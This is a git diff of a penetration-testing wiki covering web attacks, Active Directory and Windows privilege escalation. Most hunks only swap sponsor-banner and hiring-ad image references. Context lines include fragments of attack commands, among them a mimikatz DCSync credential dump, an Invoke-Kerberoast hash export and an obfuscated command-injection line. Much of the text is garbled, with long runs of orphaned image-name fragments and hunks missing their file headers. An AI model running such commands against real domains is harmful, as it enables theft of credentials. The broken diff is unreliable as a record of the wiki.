* [https://youst.in/posts/cache-poisoning-at-scale/](https://youst.in/posts/cache-poisoning-at-scale/)
* [https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9](https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9)
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/pentesting-web/clickjacking.md b/pentesting-web/clickjacking.md
index 15365a854..99e9b3a9c 100644
--- a/pentesting-web/clickjacking.md
+++ b/pentesting-web/clickjacking.md
@@ -12,7 +12,7 @@
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -177,7 +177,7 @@ See the following documentation for further details and more complex examples:
* [**https://portswigger.net/web-security/clickjacking**](https://portswigger.net/web-security/clickjacking)
* [**https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking\_Defense\_Cheat\_Sheet.html**](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking\_Defense\_Cheat\_Sheet.html)
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/pentesting-web/command-injection.md b/pentesting-web/command-injection.md
index 4fba049da..892badaf7 100644
--- a/pentesting-web/command-injection.md
+++ b/pentesting-web/command-injection.md
@@ -12,7 +12,7 @@
-
+
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
@@ -168,7 +168,7 @@ powershell C:**2\n??e*d.*? # notepad
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/pentesting-web/crlf-0d-0a.md b/pentesting-web/crlf-0d-0a.md
index 2fca6bd9f..e9c58814d 100644
--- a/pentesting-web/crlf-0d-0a.md
+++ b/pentesting-web/crlf-0d-0a.md
@@ -12,7 +12,7 @@
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
@@ -249,7 +249,7 @@ The best prevention technique is to not use users input directly inside response
* [**https://www.acunetix.com/websitesecurity/crlf-injection/**](https://www.acunetix.com/websitesecurity/crlf-injection/)
* [**https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning**](https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning)
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
diff --git a/pentesting-web/deserialization/exploiting-__viewstate-parameter.md b/pentesting-web/deserialization/exploiting-__viewstate-parameter.md
index 569ede7bc..cabeb410a 100644
--- a/pentesting-web/deserialization/exploiting-__viewstate-parameter.md
+++ b/pentesting-web/deserialization/exploiting-__viewstate-parameter.md
@@ -12,7 +12,7 @@
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
@@ -237,7 +237,7 @@ out of band request with the current username
* [**https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/**](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)
* [**https://blog.blacklanternsecurity.com/p/introducing-badsecrets**](https://blog.blacklanternsecurity.com/p/introducing-badsecrets)
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
diff --git a/pentesting-web/domain-subdomain-takeover.md b/pentesting-web/domain-subdomain-takeover.md
index 33c6c50f9..1bf109a49 100644
--- a/pentesting-web/domain-subdomain-takeover.md
+++ b/pentesting-web/domain-subdomain-takeover.md
@@ -12,7 +12,7 @@
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -89,7 +89,7 @@ All of them vulnerable to subdomain takeover. All of them were big brands. Talki
Nevertheless, recent phishing campaigns host content on domains with long domain names that include name of the brand (see [Apple example](https://www.phishtank.com/target\_search.php?target\_id=183\&valid=y\&active=All\&Search=Search)). Having valid SSL certificate (more on that below), keyword in domain name and website which mimics the website of targeted brand, people tend to fall into these attacks. Think about chances with a legitimate subdomain of this brand.
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -183,7 +183,7 @@ Until next time!
[Patrik](https://twitter.com/0xpatrik)
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/pentesting-web/email-injections.md b/pentesting-web/email-injections.md
index 9161cde28..fb49a2fb7 100644
--- a/pentesting-web/email-injections.md
+++ b/pentesting-web/email-injections.md
@@ -1,6 +1,6 @@
# Email Injections
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -165,7 +165,7 @@ So, if you are able to **send mails (maybe invitations) from the web application
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/pentesting-web/file-inclusion/phar-deserialization.md b/pentesting-web/file-inclusion/phar-deserialization.md
index cfd503f8c..155ec0d8c 100644
--- a/pentesting-web/file-inclusion/phar-deserialization.md
+++ b/pentesting-web/file-inclusion/phar-deserialization.md
@@ -12,7 +12,7 @@
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
@@ -89,7 +89,7 @@ php vuln.php
{% embed url="https://blog.ripstech.com/2018/new-php-exploitation-technique/" %}
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
diff --git a/pentesting-web/nosql-injection.md b/pentesting-web/nosql-injection.md
index 4a022b3d6..1c08a077d 100644
--- a/pentesting-web/nosql-injection.md
+++ b/pentesting-web/nosql-injection.md
@@ -1,6 +1,6 @@
# NoSQL injection
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -137,7 +137,7 @@ It's possible to use [**$lookup**](https://www.mongodb.com/docs/manual/reference
]
```
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -282,7 +282,7 @@ for u in get_usernames():
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/pentesting-web/race-condition.md b/pentesting-web/race-condition.md
index 282966db3..684644430 100644
--- a/pentesting-web/race-condition.md
+++ b/pentesting-web/race-condition.md
@@ -1,6 +1,6 @@
# Race Condition
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -52,7 +52,7 @@ Note that It **doesn't work for static files** on certain servers but as static
Using this technique, you can make 20-30 requests arrive at the server simultaneously - regardless of network jitter:
-
+
**Adapting to the target architecture**
@@ -72,13 +72,13 @@ If connection warming doesn't make any difference, there are various solutions t
Using Turbo Intruder, you can introduce a short client-side delay. However, as this involves splitting your actual attack requests across multiple TCP packets, you won't be able to use the single-packet attack technique. As a result, on high-jitter targets, the attack is unlikely to work reliably regardless of what delay you set.
-
+
Instead, you may be able to solve this problem by abusing a common security feature.
Web servers often **delay the processing of requests if too many are sent too quickly**. By sending a large number of dummy requests to intentionally trigger the rate or resource limit, you may be able to cause a suitable server-side delay. This makes the single-packet attack viable even when delayed execution is required.
-
+
{% hint style="warning" %}
For more information about this technique check the original report in [https://portswigger.net/research/smashing-the-state-machine](https://portswigger.net/research/smashing-the-state-machine)
@@ -88,7 +88,7 @@ For more information about this technique check the original report in [https://
* **Tubo Intruder - HTTP2 single-packet attack (1 endpoint)**: You can send the request to **Turbo intruder** (`Extensions` -> `Turbo Intruder` -> `Send to Turbo Intruder`), you can change in the request the value you want to brute force for **`%s`** like in `csrf=Bn9VQB8OyefIs3ShR2fPESR0FzzulI1d&username=carlos&password=%s` and then select the **`examples/race-single-packer-attack.py`** from the drop down:
-
+
If you are going to **send different values**, you could modify the code with this one that uses a wordlist from the clipboard:
@@ -141,7 +141,7 @@ Content-Length: 0
* For **delaying** the process **between** processing **one request and another** in a 2 substates steps, you could **add extra requests between** both requests.
* For a **multi-endpoint** RC you could start sending the **request** that **goes to the hidden state** and then **50 requests** just after it that **exploits the hidden state**.
-
+
### Raw BF
@@ -238,7 +238,7 @@ Operations that edit existing data (such as changing an account's primary email
Most endpoints operate on a specific record, which is looked up using a 'key', such as a username, password reset token, or filename. For a successful attack, we need two operations that use the same key. For example, picture two plausible password reset implementations:
-
+
2. **Probe for clues**
@@ -339,7 +339,7 @@ In [**WS\_RaceCondition\_PoC**](https://github.com/redrays-io/WS\_RaceCondition\
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/pentesting-web/rate-limit-bypass.md b/pentesting-web/rate-limit-bypass.md
index 3d8b4d53b..6a341c252 100644
--- a/pentesting-web/rate-limit-bypass.md
+++ b/pentesting-web/rate-limit-bypass.md
@@ -1,6 +1,6 @@
# Rate Limit Bypass
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -73,7 +73,7 @@ Maybe if you **login into your account before each attempt** (or each set of X t
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/pentesting-web/ssrf-server-side-request-forgery/README.md b/pentesting-web/ssrf-server-side-request-forgery/README.md
index fed04b206..25dcce5b4 100644
--- a/pentesting-web/ssrf-server-side-request-forgery/README.md
+++ b/pentesting-web/ssrf-server-side-request-forgery/README.md
@@ -1,6 +1,6 @@
# SSRF (Server Side Request Forgery)
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -233,7 +233,7 @@ if __name__ == "__main__":
app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)
```
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -351,7 +351,7 @@ SSRF Proxy is a multi-threaded HTTP proxy server designed to tunnel client HTTP
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/pentesting-web/xs-search.md b/pentesting-web/xs-search.md
index bba3f253a..96c6b3bc5 100644
--- a/pentesting-web/xs-search.md
+++ b/pentesting-web/xs-search.md
@@ -1,6 +1,6 @@
# XS-Search/XS-Leaks
-
+
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
@@ -76,7 +76,7 @@ You can access the tool in [https://xsinator.com/](https://xsinator.com/)
**Excluded XS-Leaks**: We had to exclude XS-Leaks that rely on **service workers** as they would interfere with other leaks in XSinator. Furthermore, we chose to **exclude XS-Leaks that rely on misconfiguration and bugs in a specific web application**. For example, CrossOrigin Resource Sharing (CORS) misconfigurations, postMessage leakage or Cross-Site Scripting. Additionally, we excluded timebased XS-Leaks since they often suffer from being slow, noisy and inaccurate.
{% endhint %}
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -214,7 +214,7 @@ You can perform the same attack with **`portal`** tags.
Applications often use [postMessage broadcasts](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage) to share information with other origins. Listening to this messages one could find **sensitive info** (potentially if the the `targetOrigin` param is not used). Also, the fact of receiving some message can be **used as an oracle** (you only receive this kind of message if you are logged in).
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -311,7 +311,7 @@ For more info: [https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/
##
-
+
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
@@ -875,7 +875,7 @@ In an execution timing it's possible to **eliminate** **network factors** to obt
* **Summary:** The [performance.now()](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/#performancenow) API can be used to measure how much time it takes to perform a request using `window.open`. Other clocks could be used.
* **Code Example**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#cross-window-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#cross-window-timing-attacks)
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -1000,7 +1000,7 @@ More generic methods:
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/pentesting-web/xss-cross-site-scripting/dom-invader.md b/pentesting-web/xss-cross-site-scripting/dom-invader.md
index 7e78303fa..fda727e3b 100644
--- a/pentesting-web/xss-cross-site-scripting/dom-invader.md
+++ b/pentesting-web/xss-cross-site-scripting/dom-invader.md
@@ -31,7 +31,7 @@ In the Burp's builtin browser go to the **Burp extension** and enable it:
Noe refresh the page and in the **Dev Tools** you will find the **DOM Invader tab:**
-
+
### Inject a Canary
diff --git a/stego/stego-tricks.md b/stego/stego-tricks.md
index c24e09d5a..2ee989d71 100644
--- a/stego/stego-tricks.md
+++ b/stego/stego-tricks.md
@@ -86,7 +86,7 @@ cmp original.jpg stego.jpg -b -l
If you find that a **text line** is **bigger** than it should be, then some **hidden information** could be included inside the **spaces** using invisible characters.\
To **extract** the **data**, you can use: [https://www.irongeek.com/i.php?page=security/unicode-steganography-homoglyph-encoder](https://www.irongeek.com/i.php?page=security/unicode-steganography-homoglyph-encoder)
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/windows-hardening/active-directory-methodology/dcsync.md b/windows-hardening/active-directory-methodology/dcsync.md
index 7b022a6a2..029980756 100644
--- a/windows-hardening/active-directory-methodology/dcsync.md
+++ b/windows-hardening/active-directory-methodology/dcsync.md
@@ -1,6 +1,6 @@
# DCSync
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -101,7 +101,7 @@ Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveG
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/windows-hardening/active-directory-methodology/kerberoast.md b/windows-hardening/active-directory-methodology/kerberoast.md
index f41bf009a..700ca98a9 100644
--- a/windows-hardening/active-directory-methodology/kerberoast.md
+++ b/windows-hardening/active-directory-methodology/kerberoast.md
@@ -1,6 +1,6 @@
# Kerberoast
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -111,7 +111,7 @@ Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASC
When a TGS is requested, Windows event `4769 - A Kerberos service ticket was requested` is generated.
{% endhint %}
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -175,7 +175,7 @@ Get-WinEvent -FilterHashtable @{Logname='Security';ID=4769} -MaxEvents 1000 | ?{
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/windows-hardening/active-directory-methodology/pass-the-ticket.md b/windows-hardening/active-directory-methodology/pass-the-ticket.md
index dd6924bea..ab30add5c 100644
--- a/windows-hardening/active-directory-methodology/pass-the-ticket.md
+++ b/windows-hardening/active-directory-methodology/pass-the-ticket.md
@@ -12,7 +12,7 @@
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -65,7 +65,7 @@ klist #List tickets in cache to cehck that mimikatz has loaded the ticket
* [https://www.tarlogic.com/blog/how-to-attack-kerberos/](https://www.tarlogic.com/blog/how-to-attack-kerberos/)
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/windows-hardening/active-directory-methodology/silver-ticket.md b/windows-hardening/active-directory-methodology/silver-ticket.md
index 2ed697e79..bb31da385 100644
--- a/windows-hardening/active-directory-methodology/silver-ticket.md
+++ b/windows-hardening/active-directory-methodology/silver-ticket.md
@@ -12,7 +12,7 @@
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
@@ -168,7 +168,7 @@ mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.loc
[dcsync.md](dcsync.md)
{% endcontent-ref %}
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
diff --git a/windows-hardening/authentication-credentials-uac-and-efs.md b/windows-hardening/authentication-credentials-uac-and-efs.md
index 240924cbb..4b9714535 100644
--- a/windows-hardening/authentication-credentials-uac-and-efs.md
+++ b/windows-hardening/authentication-credentials-uac-and-efs.md
@@ -12,7 +12,7 @@
-
+
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
@@ -273,7 +273,7 @@ The SSPI will be in charge of finding the adequate protocol for two machines tha
[uac-user-account-control.md](windows-security-controls/uac-user-account-control.md)
{% endcontent-ref %}
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md b/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md
index d603a5a0b..d539f9a7a 100644
--- a/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md
+++ b/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md
@@ -1,6 +1,6 @@
# ACLs - DACLs/SACLs/ACEs
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -93,7 +93,7 @@ The canonical order ensures that the following takes place:
* An explicit **access-denied ACE is enforced regardless of any explicit access-allowed ACE**. This means that the object's owner can define permissions that allow access to a group of users and deny access to a subset of that group.
* All **explicit ACEs are processed before any inherited ACE**. This is consistent with the concept of discretionary access control: access to a child object (for example a file) is at the discretion of the child's owner, not the owner of the parent object (for example a folder). The owner of a child object can define permissions directly on the child. The result is that the effects of inherited permissions are modified.
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -213,7 +213,7 @@ The table below shows the layout of each ACE.
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/windows-hardening/windows-local-privilege-escalation/dll-hijacking.md b/windows-hardening/windows-local-privilege-escalation/dll-hijacking.md
index f4d4010ab..f1ca230ea 100644
--- a/windows-hardening/windows-local-privilege-escalation/dll-hijacking.md
+++ b/windows-hardening/windows-local-privilege-escalation/dll-hijacking.md
@@ -12,7 +12,7 @@
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
@@ -243,7 +243,7 @@ BOOL APIENTRY DllMain (HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReser
}
```
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
diff --git a/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md b/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md
index 089fb0468..9ff685f4d 100644
--- a/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md
+++ b/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md
@@ -12,7 +12,7 @@
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
@@ -351,7 +351,7 @@ Find more Autoruns like registries in [https://www.microsoftpressstore.com/artic
* [https://attack.mitre.org/techniques/T1547/001/](https://attack.mitre.org/techniques/T1547/001/)
* [https://www.microsoftpressstore.com/articles/article.aspx?p=2762082\&seqNum=2](https://www.microsoftpressstore.com/articles/article.aspx?p=2762082\&seqNum=2)
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
diff --git a/windows-hardening/windows-security-controls/uac-user-account-control.md b/windows-hardening/windows-security-controls/uac-user-account-control.md
index 4d37c1fb4..972eda2e2 100644
--- a/windows-hardening/windows-security-controls/uac-user-account-control.md
+++ b/windows-hardening/windows-security-controls/uac-user-account-control.md
@@ -12,7 +12,7 @@
-
+
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
@@ -220,7 +220,7 @@ If you take a look to **UACME** you will note that **most UAC bypasses abuse a D
Consists on watching if an **autoElevated binary** tries to **read** from the **registry** the **name/path** of a **binary** or **command** to be **executed** (this is more interesting if the binary searches this information inside the **HKCU**).
-
+
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
.png)
 (1).png)
 (1).png)
 (1) (1).png)
 (1).png)
 (1) (1).png)
 (1).png)
 (1) (1).png)
 (1).png)
 (1) (1).png)
 (1) (1) (1) (1) (1) (1) (1) (1).png)
+ (1) (1) (1) (1) (1) (1) (1) (1) (1).png)
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
@@ -231,7 +231,7 @@ C:\Users\test\Desktop\test>pyinstaller --onefile hello.py
* [https://blog.f-secure.com/how-to-decompile-any-python-binary/](https://blog.f-secure.com/how-to-decompile-any-python-binary/)
- (1).png)
 (1) (1).png)
 (1).png)
 (1) (1).png)
.png)
.png)
.png)
 (1) (1) (1) (1) (1) (1).png)
 (1) (1) (1) (1) (1) (1) (1).png)
.png)
 (1).png)
.png)
.png)
 (1) (1) (1) (1) (1) (1) (1).png)
 (1) (1) (1) (1) (1) (1) (1) (1).png)
 (1) (1) (1) (1) (1) (1) (1).png)
 (1) (1) (1) (1) (1) (1) (1) (1).png)
 (1) (1) (1) (1) (1) (1) (1).png)
 (1) (1).png)
 (1) (1) (1).png)
 (1) (1) (1) (1).png)
 (1) (1).png)
 (1) (1) (1).png)
 (1) (1) (1).png)
 (1) (1) (1) (1).png)
 (1) (1) (1) (1) (1).png)
 (1) (1) (1) (1) (1) (1).png)
 (1) (1) (1) (1) (1) (1) (1).png)
 (1) (1) (1) (1) (1).png)
 (1) (1) (1) (1) (1) (1).png)
 (1) (1) (1) (1) (1) (1).png)
 (1) (1) (1) (1) (1) (1) (1) (1).png)
+ (1) (1) (1) (1) (1) (1) (1) (1) (1).png)
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
@@ -60,7 +60,7 @@ Content-Length: 267
* `port:15672 http`
- (1) (1) (1) (1) (1) (1) (1) (1).png)
+ (1) (1) (1) (1) (1) (1) (1) (1) (1).png)
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
@@ -40,7 +40,7 @@ You can expose **management servlets** via the following paths within JBoss (dep
inurl:status EJInvokerServlet
```
- (1) (1) (1) (1) (1).png)
 (1) (1) (1).png)
 (1) (1) (1) (1).png)
 (1) (1) (1).png)
 (1) (1).png)
 (1) (1) (1).png)
 (1) (1) (1) (1).png)
 (1) (1) (1) (1) (1) (1).png)
 (1) (1) (1) (1) (1) (1) (1).png)